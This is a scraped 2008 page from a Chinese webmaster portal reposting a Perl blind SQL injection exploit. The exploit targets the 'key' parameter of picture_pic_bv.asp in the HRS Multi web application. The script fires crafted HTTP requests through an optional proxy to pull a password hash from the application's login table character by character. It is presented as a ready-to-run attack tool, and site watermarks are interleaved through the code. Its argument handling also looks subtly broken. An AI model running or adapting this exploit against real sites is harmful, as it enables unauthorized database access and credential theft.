网管联盟 | 网管论坛 | 网管u家 | 网管博客 | 网管软件 | 网管求职 | 小游戏 | 网管搜索 | 网管原创 | 网管聚合 | 网管读摘 | 网管焦点 | 世界素材 | 会员投稿 | 会员中心 
中国网管联盟
Windows Linux Cisco 网络技术 数据库 黑客攻防 DotNet Java PHP 认证 新闻资讯 服务器 存储资讯 网络设备 网管学堂 技术专题 焦点 网吧频道
 当前位置: > bitsCN.com > 网络攻防 > 黑客技术 > Exploit > HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit  

HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit

2008-08-19  作者:bitsCN整理  来源:中国网管联盟  点评 投稿 收藏

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
  print "                                                                \n";
  print "   #################### Viva IslaMe Viva IslaMe ################\n";
  print "   #   HRS Multi Blind SQL Injection Exploit                   #\n";
  print "   #                                 (picture_pic_bv.asp key ) #\n";

网管联盟bitsCN_com


  print "   #   Author: Mr.SQL                                          #\n";
  print "   #   EMAIL : SQL@HOTMAIL.IT                                  #\n";
  print "   #                                                           #\n";
  print "   #                -((:: GrE3E3E3E3E3ETZ ::))-                #\n";
网管联盟bitsCN_com

  print "   #                                                           #\n";
  print "   #   HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab  #\n";
  print "   #                :: ALwHeD :: milw0rm ::                    #\n";
  print "   #                                                           #\n"; 网管网www_bitscn_com
  print "   #              <<>>   MuSliMs HaCkErS   <<>>                #\n";
  print "   #                                                           #\n";
  print "   #   PRODUCT SITE: http://www.softacid.net/ #\n";
  print "   #                                                           #\n"; 网管u家u.bitscn@com
  print "   #   HOME:    WwW.PaL-HaCkEr.CoM                             #\n";
  print "   #                                                           #\n";
  print "   #   Usage  : perl test.pl host                              #\n";
  print "   #   Example: perl test.pl www.host.com / -d 10              #\n";

网管网www_bitscn_com


  print "   #   Options:                                                #\n";
  print "   #     -d    valid key  value                                #\n";
  print "   #############################################################\n";
  exit;
}
my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $userid  = 1;
my $key     = $ARGV[2];
my %options = ();
GetOptions(\%options, "u=i", "p=s", "d=i");
网管下载dl.bitscn.com

print "[~] Exploiting...\n";
if($options{"u"})
{
  $userid = $options{"u"};
}
if($options{"d"})
{
  $key = $options{"d"};
}
syswrite(STDOUT, "[~] MD5-Hash: ", 14);
for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $userid, $key, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $userid, $key, $i, $h))
      { 网管u家bitscn.net
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}
print "\n[~] Exploiting done\n";
sub istrue2
{
  my $host  = shift;
  my $key   = shift;
  my $i     = shift;
  my $h     = shift; 网管u家bitscn.net

  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host."picture_pic_bv.asp?key=".$key." and (SUBSTRING((SELECT password FROM login LIMIT 0,1),".$i.",1))=CHAR(".$h.")";

网管u家bitscn.net

  if($options{"p"})
  {
    $ua->proxy('http', "http://".$options{"p"});
  } 网管有家www.bitscn.net

  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "tourterms.pdf"; 网管u家bitscn.net

  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}
 网管有家bitscn.net


TAGs         "   n"   print     my   if   <   options      
 上一篇:DigiLeave 1.2 (info_book.asp book_id) Blind SQL Injection Exploit   下一篇:MojoClassifieds 2.0 Remote Blind SQL Injection Exploit
相关文章列表
HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit 评论:
loading.. 评论加载中…
评论:请自觉遵守互联网相关政策法规,评论不得超过250字。

验证码: 注册用户
本类热门排行:
1.Scripteen Free Image Hosting Script 1.
2.PPMate PPMedia Class ActiveX Control B
3.Apache mod_jk 1.2.19 Remote Buffer Ove
4.Microsoft Access (Snapview.ocx 10.0.55
5.Cisco IOS 12.3(18) FTP Server Remote E
6.Trend Micro OfficeScan ObjRemoveCtrl A
7.Windows Media Encoder wmex.dll ActiveX
8.Linux Kernel <= 2.6.20 with DCCP Su
9.Simple Machines Forum <= 1.1.5 Admi
10.NaviCOPA Web Server 2.01 Remote Buffer
最新推荐文章:
1.Cheats Complete Website 1.1.1 (itemid)
2.Drinks Complete Website 2.1.0 (drinkid
3.BitDefender Online Scanner 8 ActiveX H
4.PHP < 4.4.5 / 5.2.1 (shmop) SSL RSA
5.PHP COM extensions (inconsistent Win32
6.PHP 4.4.6 crack_opendict() Local Buffe
7.Internet Explorer ActiveX bgColor Prop
8.CVSTrac 2.0.0 Post-Attack Database Res
9.GuppY <= 4.5.16 Remote Commands Exe
10.Trend Micro VirusWall Buffer Overflow
网管论坛交流:
·什么样的游戏,什么样的爱情.
·大家来开心一下吧---看了会很开心的东西-
·中国人不可不知道的知识
·@@小鹏◎◎小鹏同志与某位女明星亲密接触
·◎◎小鹏◎◎发现不明生物,居然正在交配
·[图文]^^^版主是什么?????
·泡论坛的女人是好女人
·做个“水性杨花”的女人
·献给mm俱乐部的所有mm
·深圳一集团企业电脑基础应用培训教程